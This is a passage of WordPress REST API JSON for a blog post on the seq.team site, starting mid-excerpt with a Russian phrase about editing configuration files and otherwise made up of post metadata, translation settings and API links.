\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-810","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/810","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=810"}],"version-history":[{"count":17,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/810\/revisions"}],"predecessor-version":[{"id":841,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/810\/revisions\/841"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=810"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=810"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=810"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}